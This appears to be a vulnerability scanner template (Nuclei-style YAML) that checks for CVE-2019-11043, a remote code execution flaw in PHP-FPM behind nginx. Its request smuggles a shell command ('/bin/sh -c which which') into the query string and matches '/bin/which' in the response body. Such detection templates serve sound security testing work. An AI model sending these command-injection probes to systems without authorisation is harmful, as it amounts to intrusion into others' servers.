id: cve-2019-11043

info:
  name: PHP-FPM & nginx RCE
  author: geeknik
  severity: high
  description: https://github.com/neex/phuip-fpizdam

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?a=/bin/sh+-c+'which+which'&"

    matchers:
      - type: word
        words:
          - "/bin/which"
        part: body